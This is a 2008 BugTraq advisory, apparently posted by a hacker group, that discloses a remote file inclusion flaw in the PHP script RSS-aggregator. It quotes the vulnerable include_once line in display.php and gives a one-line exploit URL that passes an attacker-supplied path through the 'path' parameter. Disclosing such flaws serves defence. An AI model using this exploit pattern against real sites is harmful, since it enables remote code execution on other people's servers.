BugTraq
RSS-aggregator (display) Remote File Inclusion Vulnerability Jun 25 2008 11:54AM
Ghost hacker (ghost-r00t hotmail com)


##############################################################

RSS-aggregator (display) Remote File Inclusion Vulnerability

##############################################################

[~] Found : Ghost Hacker [ R-H TeaM ]

[~] HOME : www.Real-Hack.net

[~] Email : Ghost-r00t (at) Hotmail (dot) com [email concealed]

[~] Script : RSS-aggregator

[~] Download Script : http://www.rss-aggregator.com/download.php

=========================== [ Viva IslaM ] ==========================

Error ( display.PHP ) :

include_once($path.'/admin/fonctions/config.php');

Exploit :

http://xxxx/[Path]/display.php?path=[EVIL]

=========================== [ Viva IslaM ] ==========================

[~] Gootz :

PROTO & QaTaR BoeZ TeaM & v4 TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & Jiko & Mr.JUVE

Mr.hope & Mr.MoSoS & x.CJP.x & Dr.Shares & eLe$ & MR.SQL & QaT HaCkEr ..

All Member Real Hack And All My Friends ..

##############################################################

Found By Ghost Hacker & My TeaM R-H

##############################################################

_________________________________________________________________

Express yourself instantly with MSN Messenger! Download today it's FREE!

http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus